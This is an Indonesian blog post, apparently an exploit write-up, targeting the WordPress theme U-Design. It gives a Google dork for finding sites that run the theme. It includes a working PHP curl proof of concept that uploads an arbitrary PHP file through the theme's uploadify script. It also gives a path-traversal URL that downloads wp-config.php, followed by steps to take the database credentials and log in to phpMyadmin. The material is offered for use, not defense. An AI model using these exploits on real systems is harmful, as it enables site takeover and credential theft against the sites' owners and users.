Halaman

Wordpress Themes U-Design Multiple Vulnerabilty

Rabu, 23 September 2015



#-Title: Wordpress Themes U-Design Multiple Vulnerabilty
#-Author: Tn_Scorpion
#-Date: 18/01/2015
#- Vendor : Themeforest
#- by : andondesign
#- Link Download : themeforest.net/item/udesign-responsive-wordpress-theme/253220
#-Google Dork: inurl:wp-content/themes/u-design
#- Tested on : Windows 8
--------------------------------------------------------
Multiple Vulnerabilty

Kenapa ? karena themes ini mempunyai dua bug sebenernya, tapi yang tenar cuma File uplod vulnerabilitynya doang :'v sebenernya ada ada lagi yaitu Arbitrary File Download Vulnerability. ok cukup ~

Proof Of Concept :

--
File uplod vulnerability 
--

<?php

$uploadfile="3xploi7.php";

$ch = curl_init("http://3xploi7.id/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

              array('Filedata'=>"@$uploadfile",

              'folder'=>'/wp-content/themes/u-design/scripts/admin/uploadify/'));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);



  print "$postResult";

?>

Result : Here !
--
File Download Vulnerability
--

http://3xploi7.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

1. Download Confignya
2. Buka dan cari user pw dbnya
3. login di web.com/phpmyadmin
4. terserah anda.

Tidak ada komentar:

Posting Komentar